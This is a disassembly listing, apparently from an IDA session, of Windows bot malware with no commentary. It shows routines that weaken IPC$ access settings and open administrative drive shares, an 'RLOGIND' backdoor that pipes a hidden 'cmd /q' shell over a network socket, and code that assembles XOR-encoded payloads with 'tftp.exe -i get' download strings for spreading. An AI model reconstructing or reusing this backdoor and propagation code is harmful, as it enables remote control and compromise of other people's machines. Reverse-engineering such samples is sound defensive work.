push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_43A3A0 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_411760
push offset aSecureFailed_5 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_411765
; ---------------------------------------------------------------------------
loc_411760: ; CODE XREF: sub_411650+107�j
push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_411765: ; CODE XREF: sub_411650+10E�j
push eax
call sub_416975
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A4A0 ; RegCloseKey
jmp short loc_411792
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_411650+E3�j
push offset aSecureFailed_6 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_411784
; ---------------------------------------------------------------------------
loc_41177F: ; CODE XREF: sub_411650+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_411784: ; CODE XREF: sub_411650+12D�j
lea eax, [ebp+var_220]
push eax
call sub_416975
pop ecx
pop ecx
loc_411792: ; CODE XREF: sub_411650+126�j
cmp [ebp+arg_C], ebx
jnz short loc_4117B1
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_4117B1: ; CODE XREF: sub_411650+145�j
lea eax, [ebp+var_220]
push eax
call sub_401F0F
cmp dword_43A550, ebx
pop ecx
jnz loc_411924
push edi
xor esi, esi
mov edi, 200h
loc_4117D2: ; CODE XREF: sub_411650+1EF�j
push dword_430234[esi]
push off_430230[esi]
push ebx
call sub_407C28
add esp, 0Ch
push off_430230[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_4117FE
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_411803
; ---------------------------------------------------------------------------
loc_4117FE: ; CODE XREF: sub_411650+1A5�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_411803: ; CODE XREF: sub_411650+1AC�j
push edi
push eax
call sub_416BCD
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41182C
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_41182C: ; CODE XREF: sub_411650+1C0�j
lea eax, [ebp+var_220]
push eax
call sub_401F0F
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_4117D2
call dword_422124 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_41190C
loc_411854: ; CODE XREF: sub_411650+2B6�j
test byte ptr [ebp+var_4], 1
jz loc_411901
cmp bl, 41h
jz loc_411901
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_416BCD
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_416BCD
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_43A33C ; GetDriveTypeA
cmp eax, 3
jnz short loc_411901
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_407C28
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_4118C5
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_4118CA
; ---------------------------------------------------------------------------
loc_4118C5: ; CODE XREF: sub_411650+26C�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_4118CA: ; CODE XREF: sub_411650+273�j
push edi
push eax
call sub_416BCD
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4118F4
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_4118F4: ; CODE XREF: sub_411650+288�j
lea eax, [ebp+var_220]
push eax
call sub_401F0F
pop ecx
loc_411901: ; CODE XREF: sub_411650+208�j
; sub_411650+211�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_411854
loc_41190C: ; CODE XREF: sub_411650+1FE�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_416975
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_411937
; ---------------------------------------------------------------------------
loc_411924: ; CODE XREF: sub_411650+174�j
lea eax, [ebp+var_220]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_416975
pop ecx
pop ecx
loc_411937: ; CODE XREF: sub_411650+2D2�j
cmp [ebp+arg_C], ebx
jnz short loc_411955
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_411955: ; CODE XREF: sub_411650+2EA�j
lea eax, [ebp+var_220]
push eax
call sub_401F0F
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_411650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_411969 proc near ; CODE XREF: sub_411969+1C�j
; DATA XREF: sub_40FB4C+3B4�o
push 1
push 0
push 0
push 0
call sub_411329
add esp, 10h
push dword_43022C
call dword_422000 ; Sleep
jmp short sub_411969
sub_411969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411987 proc near ; DATA XREF: sub_409848+54B8�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_4119C5
call sub_411329
jmp short loc_4119CA
; ---------------------------------------------------------------------------
loc_4119C5: ; CODE XREF: sub_411987+35�j
call sub_411650
loc_4119CA: ; CODE XREF: sub_411987+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_4139F6
pop ecx
push 0
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_411987 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4119DF proc near ; CODE XREF: sub_411C5D+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_58]
rep stosd
lea edi, [ebp+var_14]
stosd
xor esi, esi
stosd
stosd
stosd
mov eax, [ebp+arg_0]
mov edi, dword_4220E0
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_4], esi
mov [ebp+var_58], 44h
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call dword_422110 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call dword_422044 ; CreateProcessA
test eax, eax
jz short loc_411A8F
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_43B268[eax], ecx
call dword_42202C ; CloseHandle
jmp short loc_411AA5
; ---------------------------------------------------------------------------
loc_411A8F: ; CODE XREF: sub_4119DF+8E�j
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_401F83
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_411AA5: ; CODE XREF: sub_4119DF+AE�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_4119DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411AAB proc near ; DATA XREF: sub_411D59+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, dword_42208C
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_411B0D
; ---------------------------------------------------------------------------
loc_411AC4: ; CODE XREF: sub_411AAB+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_411AF6
loc_411ACF: ; CODE XREF: sub_411AAB+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_411AE6
cmp dl, 0Dh
jz short loc_411AE6
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_411AE6: ; CODE XREF: sub_411AAB+2B�j
; sub_411AAB+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_411ACF
loc_411AF6: ; CODE XREF: sub_411AAB+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_43A458 ; send
test eax, eax
jle short loc_411B24
loc_411B0D: ; CODE XREF: sub_411AAB+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx ; ReadFile
test eax, eax
jnz short loc_411AC4
loc_411B24: ; CODE XREF: sub_411AAB+60�j
mov esi, dword_422008
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411B40
call esi ; RtlGetLastWin32Error
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_401F83
pop ecx
pop ecx
loc_411B40: ; CODE XREF: sub_411AAB+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_411AAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411B48 proc near ; DATA XREF: sub_411D59+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_411C3A
; ---------------------------------------------------------------------------
loc_411B65: ; CODE XREF: sub_411B48+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_411B72
dec [ebp+74h+var_10]
jmp loc_411C3D
; ---------------------------------------------------------------------------
loc_411B72: ; CODE XREF: sub_411B48+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411C25
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_411BDC
cmp al, 7Fh
jz short loc_411BDC
cmp al, 3
jnz short loc_411B9D
push ebx
push ebx
call dword_422128 ; GenerateConsoleCtrlEvent
jmp short loc_411C03
; ---------------------------------------------------------------------------
loc_411B9D: ; CODE XREF: sub_411B48+49�j
cmp al, 15h
jnz short loc_411BBF
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_411BEF
; ---------------------------------------------------------------------------
loc_411BBF: ; CODE XREF: sub_411B48+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_411BF0
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_411BEF
; ---------------------------------------------------------------------------
loc_411BDC: ; CODE XREF: sub_411B48+41�j
; sub_411B48+45�j
cmp esi, ebx
jbe short loc_411C06
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_411BEF: ; CODE XREF: sub_411B48+75�j
; sub_411B48+92�j
pop ecx
loc_411BF0: ; CODE XREF: sub_411B48+84�j
push ebx
push ecx
lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_43A458 ; send
test eax, eax
jle short loc_411C55
loc_411C03: ; CODE XREF: sub_411B48+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_411C06: ; CODE XREF: sub_411B48+96�j
cmp al, 0Dh
jnz short loc_411C3D
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call dword_422030 ; WriteFile
test eax, eax
jz short loc_411C55
xor esi, esi
jmp short loc_411C3D
; ---------------------------------------------------------------------------
loc_411C25: ; CODE XREF: sub_411B48+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_411C33
mov [ebp+74h+var_C], 1
jmp short loc_411C3D
; ---------------------------------------------------------------------------
loc_411C33: ; CODE XREF: sub_411B48+E0�j
mov [ebp+74h+var_10], 0Ah
loc_411C3A: ; CODE XREF: sub_411B48+18�j
mov [ebp+74h+var_C], ebx
loc_411C3D: ; CODE XREF: sub_411B48+25�j
; sub_411B48+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_43A324 ; recv
test eax, eax
jg loc_411B65
loc_411C55: ; CODE XREF: sub_411B48+B9�j
; sub_411B48+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_411B48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C5D proc near ; CODE XREF: sub_411D59+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_416E1F
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_411C82
xor eax, eax
jmp loc_411D55
; ---------------------------------------------------------------------------
loc_411C82: ; CODE XREF: sub_411C5D+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call dword_422114 ; CreatePipe
test eax, eax
mov edi, dword_42202C
jnz short loc_411CC3
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_411CE4
; ---------------------------------------------------------------------------
loc_411CC3: ; CODE XREF: sub_411C5D+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call dword_422114 ; CreatePipe
test eax, eax
jnz short loc_411CEC
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_411CE4: ; CODE XREF: sub_411C5D+64�j
call sub_401F83
pop ecx
jmp short loc_411D19
; ---------------------------------------------------------------------------
loc_411CEC: ; CODE XREF: sub_411C5D+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_4119DF
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_411D4E
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_401F0F
loc_411D19: ; CODE XREF: sub_411C5D+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_411D25
push [ebp+var_4]
call edi ; CloseHandle
loc_411D25: ; CODE XREF: sub_411C5D+C1�j
cmp [ebp+var_8], 0
jz short loc_411D30
push [ebp+var_8]
call edi ; CloseHandle
loc_411D30: ; CODE XREF: sub_411C5D+CC�j
mov eax, [esi]
test eax, eax
jz short loc_411D39
push eax
call edi ; CloseHandle
loc_411D39: ; CODE XREF: sub_411C5D+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_411D43
push eax
call edi ; CloseHandle
loc_411D43: ; CODE XREF: sub_411C5D+E1�j
push esi
call sub_416D07
pop ecx
xor eax, eax
jmp short loc_411D54
; ---------------------------------------------------------------------------
loc_411D4E: ; CODE XREF: sub_411C5D+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_411D54: ; CODE XREF: sub_411C5D+EF�j
pop ebx
loc_411D55: ; CODE XREF: sub_411C5D+20�j
pop edi
pop esi
leave
retn
sub_411C5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; CODE XREF: sub_410970+1BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_411C5D
imul edi, 234h
mov esi, eax
mov eax, dword_43B26C[edi]
mov edi, dword_42200C
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411AAB
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_411DC8
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F83
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_411EA8
; ---------------------------------------------------------------------------
loc_411DC8: ; CODE XREF: sub_411D59+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411B48
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_411E09
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F83
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call dword_4220F0 ; TerminateThread
xor eax, eax
jmp loc_411EA9
; ---------------------------------------------------------------------------
loc_411E09: ; CODE XREF: sub_411D59+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call dword_42212C ; WaitForMultipleObjects
sub eax, ebx
jz short loc_411E63
dec eax
jz short loc_411E5D
dec eax
jz short loc_411E49
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_401F83
pop ecx
pop ecx
jmp short loc_411E78
; ---------------------------------------------------------------------------
loc_411E49: ; CODE XREF: sub_411D59+D9�j
mov edi, dword_4220F0
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_411E78
; ---------------------------------------------------------------------------
loc_411E5D: ; CODE XREF: sub_411D59+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_411E67
; ---------------------------------------------------------------------------
loc_411E63: ; CODE XREF: sub_411D59+D3�j
push ebx
push dword ptr [esi+14h]
loc_411E67: ; CODE XREF: sub_411D59+108�j
call dword_4220F0 ; TerminateThread
push 1
push dword ptr [esi+8]
call dword_4220E8 ; TerminateProcess
loc_411E78: ; CODE XREF: sub_411D59+EE�j
; sub_411D59+102�j
push dword ptr [esi+10h]
mov edi, dword_42202C
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_43A4D0 ; closesocket
push esi
call sub_416D07
xor eax, eax
inc eax
loc_411EA8: ; CODE XREF: sub_411D59+6A�j
pop ecx
loc_411EA9: ; CODE XREF: sub_411D59+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
sub_411EAE proc near ; CODE XREF: sub_411EDA+A�p
; sub_4120DD+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
lea edx, [eax+1]
loc_411EB5: ; CODE XREF: sub_411EAE+C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411EB5
sub eax, edx
push esi
mov esi, eax
mov eax, [esp+4+arg_4]
lea ecx, [eax+1]
loc_411EC8: ; CODE XREF: sub_411EAE+1F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411EC8
sub eax, ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_411EAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411EDA proc near ; CODE XREF: sub_4120F4+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_411EAE
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_411EF7
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_411EF7: ; CODE XREF: sub_411EDA+17�j
mov eax, [ebp+arg_8]
lea edx, [eax+1]
loc_411EFD: ; CODE XREF: sub_411EDA+28�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411EFD
sub eax, edx
push ebx
mov edx, eax
mov eax, [ebp+arg_C]
push esi
push edi
mov [ebp+arg_4], edx
lea esi, [eax+1]
loc_411F14: ; CODE XREF: sub_411EDA+3F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411F14
sub eax, esi
mov ebx, [ebp+arg_0]
lea ecx, [eax+edx+12h]
mov dword_4302E4, ecx
push 0FFFFFFEDh
lea ecx, [eax+1]
mov dword_430305, ecx
lea ecx, [eax+17h]
mov dword_4302FD, ecx
pop ecx
sub ecx, eax
mov dword_430313, ecx
push 1Dh
pop ecx
mov edi, ebx
mov esi, offset dword_430280
rep movsd
mov esi, [ebp+arg_8]
mov ecx, edx
shr ecx, 2
lea edi, [ebx+74h]
rep movsd
mov ecx, edx
mov edx, [ebp+arg_4]
and ecx, 3
rep movsb
add edx, 74h
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+0Ch)
movsd
movsb
mov esi, [ebp+arg_C]
add edx, 5
lea edi, [edx+ebx]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
mov ebx, [ebp+arg_0]
and ecx, 3
rep movsb
add edx, eax
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+11h)
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_C]
add edx, 10h
mov ecx, eax
lea edi, [edx+ebx]
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
push 0Eh
lea edi, [edx+eax]
add edi, [ebp+arg_0]
mov eax, [ebp+var_4]
pop ecx
mov esi, offset byte_430309
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_411EDA endp
; =============== S U B R O U T I N E =======================================
sub_411FD2 proc near ; CODE XREF: sub_411FED+41�p
; sub_4120DD+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_411FDB
inc ecx
loc_411FDB: ; CODE XREF: sub_411FD2+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_411FD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411FED proc near ; CODE XREF: sub_4120F4+56�p
; .text:00414987�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
cmp bl, 0Ah
push esi
jz short loc_412008
cmp bl, 0Dh
jz short loc_412008
cmp bl, 5Ch
jz short loc_412008
test bl, bl
jnz short loc_412009
loc_412008: ; CODE XREF: sub_411FED+B�j
; sub_411FED+10�j ...
inc ebx
loc_412009: ; CODE XREF: sub_411FED+19�j
mov esi, 0FFh
cmp ebx, esi
jbe short loc_41202D
mov eax, ebx
shr eax, 8
cmp al, 0Ah
jz short loc_412027
cmp al, 0Dh
jz short loc_412027
cmp al, 5Ch
jz short loc_412027
test al, al
jnz short loc_41202D
loc_412027: ; CODE XREF: sub_411FED+2C�j
; sub_411FED+30�j ...
add ebx, 100h
loc_41202D: ; CODE XREF: sub_411FED+23�j
; sub_411FED+38�j
push ebx
call sub_411FD2
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+arg_C], eax
ja short loc_412043
cmp eax, 0FFFFh
jbe short loc_41204A
loc_412043: ; CODE XREF: sub_411FED+4D�j
xor eax, eax
jmp loc_4120D9
; ---------------------------------------------------------------------------
loc_41204A: ; CODE XREF: sub_411FED+54�j
mov dl, byte_480D40
xor eax, eax
test ebx, ebx
jbe short loc_412078
loc_412056: ; CODE XREF: sub_411FED+89�j
mov ecx, [ebp+arg_8]
mov cl, [eax+ecx]
xor cl, dl
jz short loc_41206F
cmp cl, 0Ah
jz short loc_41206F
cmp cl, 0Dh
jz short loc_41206F
cmp cl, 5Ch
jnz short loc_412073
loc_41206F: ; CODE XREF: sub_411FED+71�j
; sub_411FED+76�j ...
inc dl
xor eax, eax
loc_412073: ; CODE XREF: sub_411FED+80�j
inc eax
cmp eax, ebx
jb short loc_412056
loc_412078: ; CODE XREF: sub_411FED+67�j
cmp ebx, esi
push edi
mov edi, [ebp+arg_0]
push 5
mov byte_480D40, dl
pop ecx
ja short loc_4120A0
mov esi, offset loc_430268
mov byte_430275, bl
mov byte_430279, dl
rep movsd
push 15h
jmp short loc_4120B8
; ---------------------------------------------------------------------------
loc_4120A0: ; CODE XREF: sub_411FED+9A�j
mov word_43025E, bx
mov byte_430263, dl
mov esi, offset loc_430250
rep movsd
movsw
push 17h
loc_4120B8: ; CODE XREF: sub_411FED+B1�j
pop eax
xor ecx, ecx
test ebx, ebx
movsb
pop edi
jbe short loc_4120D6
mov esi, [ebp+arg_0]
add esi, eax
loc_4120C6: ; CODE XREF: sub_411FED+E7�j
mov eax, [ebp+arg_8]
mov al, [ecx+eax]
xor al, dl
mov [esi+ecx], al
inc ecx
cmp ecx, ebx
jb short loc_4120C6
loc_4120D6: ; CODE XREF: sub_411FED+D2�j
mov eax, [ebp+arg_C]
loc_4120D9: ; CODE XREF: sub_411FED+58�j
pop esi
pop ebx
pop ebp
retn
sub_411FED endp
; =============== S U B R O U T I N E =======================================
sub_4120DD proc near ; CODE XREF: sub_4120F4+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_411EAE
push eax
call sub_411FD2
add esp, 0Ch
retn
sub_4120DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4120F4 proc near ; CODE XREF: sub_413C88+6D�p
; sub_41432A+30�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_4120DD
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_412114
cmp eax, 0FFFFh
jbe short loc_412118
loc_412114: ; CODE XREF: sub_4120F4+17�j
xor eax, eax
jmp short loc_41215D
; ---------------------------------------------------------------------------
loc_412118: ; CODE XREF: sub_4120F4+1E�j
push esi
push edi
push ebx
call sub_411EAE
add eax, 101h
push eax
call sub_416E1F
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_411EAE
pop ecx
pop ecx
push eax
push esi
call sub_411EDA
